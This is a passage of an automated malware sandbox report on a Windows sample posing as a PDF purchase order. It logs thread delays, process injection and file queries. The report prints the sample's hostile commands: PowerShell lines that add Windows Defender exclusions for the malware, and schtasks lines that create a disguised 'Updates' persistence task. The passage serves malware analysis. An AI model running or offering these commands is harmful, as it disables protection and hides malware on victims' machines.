                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598906
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598797
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598687
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598576
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598469
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598318
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598134
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598002
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597890
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597775
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597672
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597168
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597062
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596952
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596843
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596734
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596595
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596344
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596122
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595797
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595687
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595568
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594729
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594625
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594511
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594406
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594297
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594187
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594073
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593953
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593843
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593734
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593625
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593515
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593402
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593297
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593187
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599529
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599313
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599063
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598938
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598155
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598008
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597688
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597563
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597438
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595869
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595608
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595371
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595151
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594200
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594092
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593982
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593874
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599516
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599406
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599297
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599063
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598938
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595675
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593985
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3854506593.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3855064839.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1618746266.00000000014AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: sgxIb.exe, 00000018.00000002.3855625299.00000000013B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory written: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
